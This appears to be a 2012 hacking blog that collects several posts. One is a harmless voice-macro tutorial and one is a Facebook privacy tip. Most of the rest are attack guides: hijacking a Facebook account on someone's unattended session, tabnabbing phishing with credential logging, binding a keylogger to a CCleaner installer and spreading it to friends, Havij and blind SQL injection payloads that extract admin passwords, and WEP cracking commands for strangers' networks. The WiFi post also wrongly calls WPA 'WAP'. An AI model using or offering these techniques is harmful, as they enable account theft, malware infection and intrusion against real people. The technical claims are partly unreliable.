Thursday 20 December 2012

Make Your PC Talk like Iron Man jarvis Operating System

Speaking Computer

Hello Friends Today I am posting on one of the interesting topic that is making your pc talk .yes it is possible you can make your pc speech recognizable like you have seen in some Hollywood movie like iron man,chitti form Robort Movie(Rajnikant :D).Here is a brief tutorial that will explain you in details.

In Iron Man Movie It was the jarvis Operating which helps Iron Man in completing any computer related task that he wants to perform with voice recognition support-ability.Jarvis is totally based on Artificial intelligence aka Artificial Brain. Eventually, we can't have such a huge artificial brain r8 now with us bust we can have a start to this project and believe me you will enjoy it a lot .
Let Me demonstrate you few examples:


  • Give a Name to your Computer Like "Jarvis" and when you'll say "Jarvis" it will reply "Hello sir" or "Hello Mr. (Your Name)".
    or
    You : Who are you ??
    Computer : I'm chitti The robo Speed, 1 terahertz, memory, one zettabyte
    (Just Like Rajnikanth's Moive "robot", (Enthiran) in Tamil.)
    Example 2 :
    YOU: Good Morning Jarvis !
    COMPUTER : Good Morning Mr. Stark ! how are you Today !

    So, Little wondering how these things going to work out ? Here you can transform your wondering into reality. Follow these codes :

    Example 1 :
    Example 1 : 

    <listenFor>Jarvis</listenFor>

    <speak>Hello Mr. STark</speak>

    </command>

    </speechMacros>



    Example 2 :

    <listenFor>Good Morning Jarvis</listenFor>

    <speak>Good Morning Sir. how are you today</speak>

    </command>

    </speechMacros>



    Further, more you can use these lines of codes for Shutting down Computer :

    <speechMacros>

    <command>

    <listenFor>Nuke it</listenFor>

    <speak>Restarting Windows</speak>

    <run command="C:\Windows\System32\shutdown.exe"/>

    </command>

    </speechMacros>



    To make it more intresting and realastic you need a bit knwoledge of VB.NET

    here is one example



    <speechMacros>

    <command>

    <listenFor>Time</listenFor>

    <listenFor>Give me the Time</listenFor>

    <listenFor>What is the time</listenFor>

    <listenFor>Tell me the time</listenFor>

    <listenFor>What time is it</listenFor>

    <script language="vbscript">

    <![CDATA[

    dim currentTime

    currentTime = FormatDateTime(Time(), 1)

    Application.Speak Time

    Application.SetTextFeedback Time

    ]]>

    </script>

    </command>



    now i have ms exel work then..


    <command priority="100">

      <listenFor>insert row above</listenFor>

      <sendKeys>{ALT}jla</sendKeys>

    </command>

    <command priority="100">

      <listenFor>insert row below</listenFor>

      <sendKeys>{ALT}jle</sendKeys>

    </command>

    <command priority="100">

      <listenFor>insert column before</listenFor>

      <sendKeys>{ALT}jll</sendKeys>

    </command>

    <command priority="100">

      <listenFor>insert column after</listenFor>

      <sendKeys>{ALT}jlr</sendKeys>

    </command>

    <command priority="100">

      <listenFor>merge cells</listenFor>

      <sendKeys>{ALT}jlm</sendKeys>

    </command>

    <command priority="100">

      <listenFor>split table</listenFor>

      <sendKeys>{ALT}jlq</sendKeys>

    </command>

    <command priority="100">

      <listenFor>delte row</listenFor>

      <listenFor>delte rows</listenFor>

      <sendKeys>{ALT}jdr</sendKeys>

    </command>

    <command priority="100">

      <listenFor>delete column</listenFor>

      <listenFor>delete columns</listenFor>

      <sendKeys>{ALT}jdc</sendKeys>

    </command>

    <command priority="100">

      <listenFor>?show table properties</listenFor>

      <sendKeys>{ALT}jdo</sendKeys>

    </command>

    <command priority="100">

      <listenFor>?show ?hide table gridlines</listenFor>

      <sendKeys>{ALT}jltg</sendKeys>

    </command>


    Track chnages in Music

    <command priority="100">
      <listenFor>next change</listenFor>
      <sendKeys>{ALT}rh</sendKeys>
    </command>
    <command priority="100">
      <listenFor>accept change</listenFor>
      <sendKeys>{ALT}rac</sendKeys>
    </command> 

    To click

    <command priority="100">
     <listenFor>?mouse click</listenFor>   <mouse button="left" command="click" />
    </command>

    if you need codes of any command leave comment below, and i will try to give you source codes.

    How To Make These Command Working


  • Things you need -
    A microphone or internal Microphone
    windows 7 and windows speech macros, download it from here
    install it then make Macros to start work
  • Now open notepad and paste code in notepad
  • for example
    <listenFor>Jarvis</listenFor>

    <speak>Hello Mr. STark</speak>

    </command>

    </speechMacros>

    paste it and save as filename.WSRMac
    .WSRMac extention is must for it,
    then Goto your WSRMac file and click on
    Now click on "import signing Cerificate" and automaticly it will save a digital signature for it.See Image Below.

    Now Open Speech recognition And Say Your Command.


    Enjoy Talking to your Computer ! :D

    Now to Make Your Pc Look And Awesome Feel From This post.

    Credit Goes To: Devils Cafe
  • Tuesday 18 December 2012

    Change Facebook Password without knowing the current Password

    What if by chance you get a facebook user account who has not logged out from his/her email id.

    You can take advantage of this golden opportunity and change his/her facebook email id password without even knowing his current password. This would help you to login in the id whenver you want.
    Here are some simple steps to follow to change the password without even knowing the current passwords.

    Step 1. Click the link below and open it in new tab in your browser. 
    CLICK HERE.


    You would see something like this:-

        Steps 2. Click on Continue as shown below.

        Step 3. Just fill up the New password and confirm password and hit continue.

        Hurrah.. you just changed the password.

         Enjoy and have fun :D

    Saturday 8 December 2012

    How to Hack Facebook Account By Tabnapping and Keylogger (Full Tutorial)

    Hi Guys
    Today i will give tutorial on Facebook Hacking..>!!

    NOTE: This tutorial is for Educational purposes only i.e. to make you aware how hackers hack your Facebook accounts. Please don't misuse it. I and Isoftdl is not responsible for any damage caused by you.

                                          Hack FB Accounts By Tabnapping :-                                                                                                             

    Tab-nabbing is an advanced  Phishing technique .it requires a lot of coding to be done ,But i have tried to keep it as simple as possible hope you like the following tutorial


    • Requirements :-

    1. A Free Web Hosting Account - You can use110mb.com or ripway.com


    2. You should have the following files which are required for tabnabbing   


    1. Facebook.html  -Fake Facebook login page (phisher) 

    2. login.php - Script which captures the login details of the victim

    3. google.html - Standard google page used to trick the user

    4. tabnabb.js - Java script which is required for tabnabbing

    You can download all the files from Here  & to get the password Click Here


    File Provided By a Blogger..>!!!!

    Procedure 
    1. First a fall  download all  the files and extract them using winrar or win-zip , Then upload  facebook.html ,login.php & google.html to your free web webhosting account

    2. Now open tabnabb.js using a notepad , Search for "Enter your URL here" , Now replace it with your "Facebook.html" url which you uploaded in the previous step, finally save it and upload  tabnabb.js to your hosting account

    3. By now you should have successfully uploaded all the four files to your hosting account as shown
    4. Now to check whether the hack is working, click on the google.html link and open it , Now open few new tabs , After some time you will see google page switched to your fake Facebook page
    5. Now once the victim enters all his credentials in our fake facebook login page and clicks login, he will be redirected to Facebook.com/careers  page to avoid suspecion

    6. To see the victim login details go to your hosting account where you will see a new file "log.txt" Open it to see the victims user-id and password

                                          Hack FB Accounts By Keylogger :-                                     



    Steps to hack Facebook account using Keylogger:

    1. Creating the Keylogger Server to hack Facebook passwords.

    2. Extracting the Icon from installer.

    3. Bind the keylogger server with any software setup.

    4. How to spread your keylogger or send it to your friends to hack their Facebook accounts or passwords.

    Step 1 :- Creating The Keylogger Server

    1. Download the keylogger.
    2. Extract the file, Now you will get two folders:

    a. First one contains Keylogger and Binder
    b. Second Contains resource hacker tool.( to extract the icons from installers).

    3. Now open the Keylogger. It contains two files one for gmail email and other for password. For this create one test account on Gmail and enter it's details in this.

    4. After entering email and password. Set the time interval usually set 3 mins i.e. after how much time you want to receive logs from the user.

    5. Now click on send verification mail. This mail is to test that your keylogger is working correctly or not.

    6. After you click this you will receive a confirmation mail on test account which will confirm that keylogger is working.

    7. Now click on generate to set the mutex (any secret key to make your keylogger FUD) and then click on compile server.

    8. Now save the file to desktop or any other location of your choice. Now your server is ready but it can be easily detected.

    Step 2.: Extracting the Icon file from any installer(resource hacker)

    1. Open the Resource hacker folder and open the reshacker file.

    2. Now go to its menu and open any setup file. Suppose we w
    ant to attach our keylogger to Ccleaner setup file. So open the Ccleaner setup with resource hacker. 

    3. Now in menu there is one action button click on it and then click save all resources.

    4. Now save all the resources to desktop or any other location of your choice.

    5. It consists of two files one is icon file and other is res file . We only need icon file, so you can delete the other file i.e res file.

    6. Now we have Icon of installer file(as discussed above Ccleaner setup Icon).

    Step 3: Bind the Keylogger server with any software

    1. Now Go to keylogger folder and open the Binder.

    2. Now Click on + button given below to add files.

    3. Now add the keylogger server and the set up of software (i.e. in our case it's Ccleaner setup).

    4. Now in menu of Binder, Go to Settings. There select the icon that we have generated in the previous step and set the location of output file as shown in figure.

    5. Now again go to File's menu in Binder and click on Bind files.

    6. Now your Binded keylogger is ready. Now you have to spread it or send it to the victim that is your friend.

    Step4 : How to Spread Keylogger or send it to victim or friend

    1. Now you have one Software setup file with keylogger attached with it.(In our case we have Ccleaner setup with keylogger attached with it.




    2. Now Spread your keylogger through forums. You might be a member of various forums use them to spread your keylogger in form of software posts. You can use various software's to spread them that users frequently download.




    3. Spread it through pendrives or USB hard drives. Suppose a friend asked you for a software give it the software that has keylogger attached with it. 




    Note: you can also attach keylogger with images also. But that can be detectable by antivirus. So avoid such type of hacking.


    So isn't that so easy to hack anyone's Facebook account in just few minutes. 





    Wednesday 5 December 2012

    Hack Website Using Havij


    Hi Guys in this article i will tell you how you can hack website using sql injection havij :D


    Just Follow these easy steps :-


    1. First download havij from here 
        http://itsecteam.com/


    2.  Run Havij SQL Injection software and copy and paste vulnerable website link


    3.  Now click in the “Analyze” Button


    4. Then It shows some messages there. Be alert on it and be show patience for sometime to find it’s vulernable and type of      injection and if db server is mysql and it will find database name.Then after get it’s database is name like xxxx_xxxx


    5.  Then Move to another operation to find tables by clicking “tables” as figure shown. Now click “Get tables” Then wait some time if needed


    6.  After founded the tables ,you can see there will be “users” Put mark on it and click in the ” get columns ” tab 


    7.  In that Just put mark username and password and click “Get data”


    8. Finally you got now username and password of the admin…


    Thanks For Reading!!!

    BliNd SQL InjeCtion TutOrial


    Hi guys,
    Today i will give u tutorial on Blind Sql Injection

    First Like Us on FB-
    www.facebook.com\ComputerExpertt


    Let's start with advanced stuff.


    I will be using our example

    http://www.site.com/news.php?id=5

    when we execute this, we see some articles on that page, pictures etc...

    then when we want to test it for blind sql injection attack

    http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

    and the page loads normally, that's ok.

    now the real test

    http://www.site.com/news.php?id=5 and 1=2 <--- this is false

    so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

    Steps -

    1) Get the MySQL version

    to get the version in blind attack we use substring

    i.e

    http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

    this should return TRUE if the version of MySQL is 4.

    replace 4 with 5, and if query return TRUE then the version is 5.

    i.e

    http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

    2) Test if subselect works

    when select don't work then we use subselect

    i.e

    http://www.site.com/news.php?id=5 and (select 1)=1

    if page loads normally then subselects work.

    then we gonna see if we have access to mysql.user

    i.e

    http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

    if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

    3). Check table and column names

    This is part when guessing is the best friend :)

    i.e.

    http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

    then if the page loads normally without content missing, the table users exits.
    if you get FALSE (some article missing), just change table name until you guess the right one :)

    let's say that we have found that table name is users, now what we need is column name.

    the same as table name, we start guessing. Like i said before try the common names for columns.

    i.e

    http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

    if the page loads normally we know that column name is password (if we get false then try common names or just guess)

    here we merge 1 with the column password, then substring returns the first character (,1,1)


    4). Pull data from database

    we found table users i columns username password so we gonna pull characters from that.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

    ok this here pulls the first character from first user in table users.

    substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

    and then compare it with simbol greater then > .

    so if the ascii char greater then 80, the page loads normally. (TRUE)

    we keep trying until we get false.


    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

    we get TRUE, keep incrementing


    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

    TRUE again, higher

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

    FALSE!!!

    so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

    then let's check the second character.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

    Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)


    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

    TRUE, the page loads normally, higher.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

    FALSE, lower number.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

    TRUE, higher.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

    FALSE!!!

    we know that the second character is char(105) and that is 'i'. We have 'ci' so far

    so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

    There are some tools for Blind SQL Injection, i think sqlmap is the best


    Suscribe Me On Facebook-
    www.facebook.com\AnuragAkaProgrammer

    Like Us on FB-
    www.facebook.com\ComputerExpertt
    Thanks For Reading!!!

    STOP UNWANTED PHOTO TAGS IN FACEBOOK TIMELINE | PROFILE

    Be Save From Spam

    Timeline Review controls whether you have to manually approve posts you're tagged in before they go on your timeline. When you have a post to review, the Needs Review tab will appear on your timeline. This feature is Disabled by default and you have to Enable it. By Enabling this feature you will get an option to approve/disapprove posts you're tagged in before they go on your timeline.

    You can Enable This Option by few simple steps:

    Step 1: Go to your Facebook Privacy Settings


    Step 2: Simple go to “Privacy Settings > Timeline and Tagging > Review posts friends tag you in before they appear on your Timeline” and Set “On” This option.


    Step 3:Click on Edit settings of Timeline and Tagging Option.


    Step 4: You will see an option “Review posts friends tag you in before they appear on your Timeline”, Now click on “Off” and set it to “On” to enable this feature for you.

    Step 5:And Now Finally Enable this Feature.

    After saving the changes if someone tag you on facebook then you will get Options to either Approve or Disapprove the posts. These posts will not visible on your Timeline until you manually approve them.


    Thanks For Reading!!!

    How to hack a wi-fi network (Full Tutorial)



    FIRST I MAKE IT CLEAR THAT WE DOES NOT MAKE PEOPLE ETHICAL HACKER HERE ALL TRICKZ ARE ONLY FOR KNOWLADGE PURPOSE HACKING IS A CRIME DONT CHEAT INOCENT PEOPLE WITH YOUR POWERS. 

    Doesn’t it irritate when you see your laptop’s catching so many wi-fi signals but none of them is accessible.. don’t you feel like “I wish I could some how break the password and dive into the deep oceans of the information” I beleive everyone should be able to have free internet
    . If someday I make it big enough and I’ll be having ample money.. I promise I’ll provide free wifi hotspots all over the places.. “Let there be INTERNET”.. even If I don’t get rich.. I’ll become a politician and would make Internet a Fundemental right to every citizen.. Now that would be something..
    That’s enough with the Castles in the air.. now lets get back to reality..
    What I can do for you right now is that I can tell you how to hack a wifi network to access Internet.. Some would call it stealing.. some like me won’t..
    I’ll call it Sharing.. Sharing is what on which the whole Internet is build upon…
    So.. Here’s how we do it..

    1) First we need to scan for available wireless networks.
    Theres this great tool for windows to do this.. called “NetStumbler” or Kismet for Windows and Linux and KisMac for Mac.
    The two most common encryption types are:
    1) WEP
    2) WAP
    WEP i.e Wire Equivalent Privacy is not consideres as safe as WAP 
    i.e Wireless Application Protocol.
    WEP have many flaws that allows a hacker to crack a WEP key easily.. whereas

    WAP is currently the most secure and best option to secure a wi-fi network..
    It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.
    Here I’ll tell you how to Crack WEP
    To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP.
    BackTrack have lots of preinstalled softwares for this very purpose..
    The tools we will be using on Backtrack are:
    Kismet – a wireless network detector
    airodump – captures packets from a wireless router
    aireplay – forges ARP requests
    aircrack – decrypts the WEP keys


    1) First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.


    2) To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.


    3) In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).


    4) Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit <ENTER> to get more information about it.

    5) The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:
    airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]
    In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.


    6) Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:
    aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]
    In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.


    7) Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:
    aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]
    In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.
     Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:
    aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs
    In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC address, and the -n 128 tells the program the WEP key length. If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.

    8) Enjoy

    Search This Blog